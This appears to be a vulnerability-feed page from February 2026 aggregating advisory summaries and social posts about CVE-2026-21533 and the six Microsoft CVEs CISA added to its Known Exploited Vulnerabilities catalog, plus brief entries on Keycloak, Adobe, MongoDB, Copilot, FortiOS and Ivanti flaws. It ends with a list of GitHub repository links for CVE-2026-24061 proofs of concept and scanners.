CVE-2026-21533
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21533
🛡️ CWE: CWE-269
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21533
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21533
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🟠 CVE-2026-21533 - High (7.8)
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21533/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21533
CVE-2026-21533
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21533
🛡️ CWE: CWE-269
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21533
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21533
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T19:57:02
2 posts
🟠 CVE-2026-25577 - High (7.5)
Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticate...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25577/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25577 - High (7.5)
Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticate...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25577/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:35:21
3 posts
2 repos
CVE-2026-1529 - keycloak: unauthorized organization registration via improper invitation token validation https://lobste.rs/s/ghqflm #security
https://cvefeed.io/vuln/detail/CVE-2026-1529
CVE-2026-1529 - keycloak: unauthorized organization registration via improper invitation token validation https://lobste.rs/s/ghqflm #security
https://cvefeed.io/vuln/detail/CVE-2026-1529
🟠 CVE-2026-1529 - High (8.1)
A flaw was found in Keycloak. An attacker can exploit this vulnerability by modifying the organization ID and target email within a legitimate invitation token's JSON Web Token (JWT) payload. This lack of cryptographic signature verification allow...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1529/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:35:16
2 posts
🟠 CVE-2026-1486 - High (8.8)
A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1486/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1486 - High (8.8)
A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-grant flow where the server fails to verify if an Identity Provider (IdP) is enabled before issuing tokens. The issuer lookup mechanism (lookupIdentityProviderFromIssuer...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1486/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:54
2 posts
🟠 CVE-2026-25611 - High (7.5)
A series of specifically crafted, unauthenticated messages can exhaust available memory and crash a MongoDB server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25611/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25611 - High (7.5)
A series of specifically crafted, unauthenticated messages can exhaust available memory and crash a MongoDB server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25611/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
🟠 CVE-2026-21260 - High (7.5)
Exposure of sensitive information to an unauthorized actor in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21260/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21260 - High (7.5)
Exposure of sensitive information to an unauthorized actor in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21260/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
🟠 CVE-2026-21259 - High (7.8)
Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21259/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21259 - High (7.8)
Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21259/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
🟠 CVE-2026-21322 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21322 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
🟠 CVE-2026-21318 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21318/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21318 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21318/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
🟠 CVE-2026-21330 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue req...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21330/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21330 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue req...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21330/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
🟠 CVE-2026-21327 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21327/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21327 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21327/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
🟠 CVE-2026-21251 - High (7.8)
Use after free in Windows Cluster Client Failover allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21251/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21251 - High (7.8)
Use after free in Windows Cluster Client Failover allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21251/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
🟠 CVE-2026-21250 - High (7.8)
Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21250/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21250 - High (7.8)
Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21250/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
🟠 CVE-2026-21329 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21329/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21329 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21329/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
🟠 CVE-2026-21326 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21326/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21326 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21326/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
🟠 CVE-2026-21351 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21351/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21351 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21351/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21256 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21256/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21256 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21256/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21255 - High (8.8)
Improper access control in Windows Hyper-V allows an authorized attacker to bypass a security feature locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21255/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21255 - High (8.8)
Improper access control in Windows Hyper-V allows an authorized attacker to bypass a security feature locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21255/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21312 - High (7.8)
Audition versions 25.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must op...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21312/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21312 - High (7.8)
Audition versions 25.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must op...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21312/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21321 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21321/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21321 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21321/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21325 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21325/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21325 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21325/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21335 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21335/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21335 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21335/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21334 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21334/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21334 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21334/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21516 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in Github Copilot allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21516/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21516 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in Github Copilot allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21516/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:48
1 posts
Critical FortiOS Vulnerability Exposes Networks to LDAP Authentication Bypass
Fortinet has issued a major security alert warning of a serious flaw in its FortiOS firewall software. The vulnerability, tracked as CVE-2026-22153, allows attackers to bypass LDAP authentication entirely—meaning hackers can gain access without needing a valid username or password. This type of breach could compromise sensitive enterprise networks and VPN connections, putting critical data at…
##updated 2026-02-10T18:30:40
1 posts
RE: https://infosec.exchange/@ozu/116041085922526875
Another another vuln. CVE-2025-52436
##updated 2026-02-10T18:30:38
2 posts
New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##updated 2026-02-10T18:30:34
4 posts
62 repos
https://github.com/SeptembersEND/CVE--2026-24061
https://github.com/lavabyte/telnet-CVE-2026-24061
https://github.com/TryA9ain/CVE-2026-24061
https://github.com/nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector
https://github.com/Moxxic1/moxxic1.github.io
https://github.com/Mefhika120/Ashwesker-CVE-2026-24061
https://github.com/XsanFlip/CVE-2026-24061-Scanner
https://github.com/monstertsl/CVE-2026-24061
https://github.com/cumakurt/tscan
https://github.com/killsystema/scan-cve-2026-24061
https://github.com/parameciumzhang/Tell-Me-Root
https://github.com/cyberpoul/CVE-2026-24061-POC
https://github.com/BrainBob/CVE-2026-24061
https://github.com/Gabs-hub/CVE-2026-24061_Lab
https://github.com/xuemian168/CVE-2026-24061
https://github.com/obrunolima1910/CVE-2026-24061
https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root
https://github.com/balgan/CVE-2026-24061
https://github.com/h3athen/CVE-2026-24061
https://github.com/SafeBreach-Labs/CVE-2026-24061
https://github.com/leonjza/inetutils-telnetd-auth-bypass
https://github.com/punitdarji/telnetd-cve-2026-24061
https://github.com/madfxr/Twenty-Three-Scanner
https://github.com/hilwa24/CVE-2026-24061
https://github.com/0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061
https://github.com/Good123321-bot/CVE-2026-24061-POC
https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd
https://github.com/SystemVll/CVE-2026-24061
https://github.com/hackingyseguridad/root
https://github.com/Parad0x7e/CVE-2026-24061
https://github.com/z3n70/CVE-2026-24061
https://github.com/infat0x/CVE-2026-24061
https://github.com/Chocapikk/CVE-2026-24061
https://github.com/r00tuser111/CVE-2026-24061
https://github.com/typeconfused/CVE-2026-24061
https://github.com/ms0x08-dev/CVE-2026-24061-POC
https://github.com/Mr-Zapi/CVE-2026-24061
https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-
https://github.com/canpilayda/inetutils-telnetd-cve-2026-24061
https://github.com/ibrahmsql/CVE-2026-24061-PoC
https://github.com/yanxinwu946/CVE-2026-24061--telnetd
https://github.com/buzz075/CVE-2026-24061
https://github.com/ridpath/Terrminus-CVE-2026-2406
https://github.com/X-croot/CVE-2026-24061_POC
https://github.com/midox008/CVE-2026-24061
https://github.com/Good123321-bot/good123321-bot.github.io
https://github.com/Alter-N0X/CVE-2026-24061-POC
https://github.com/scumfrog/cve-2026-24061
https://github.com/m3ngx1ng/cve_2026_24061_cli
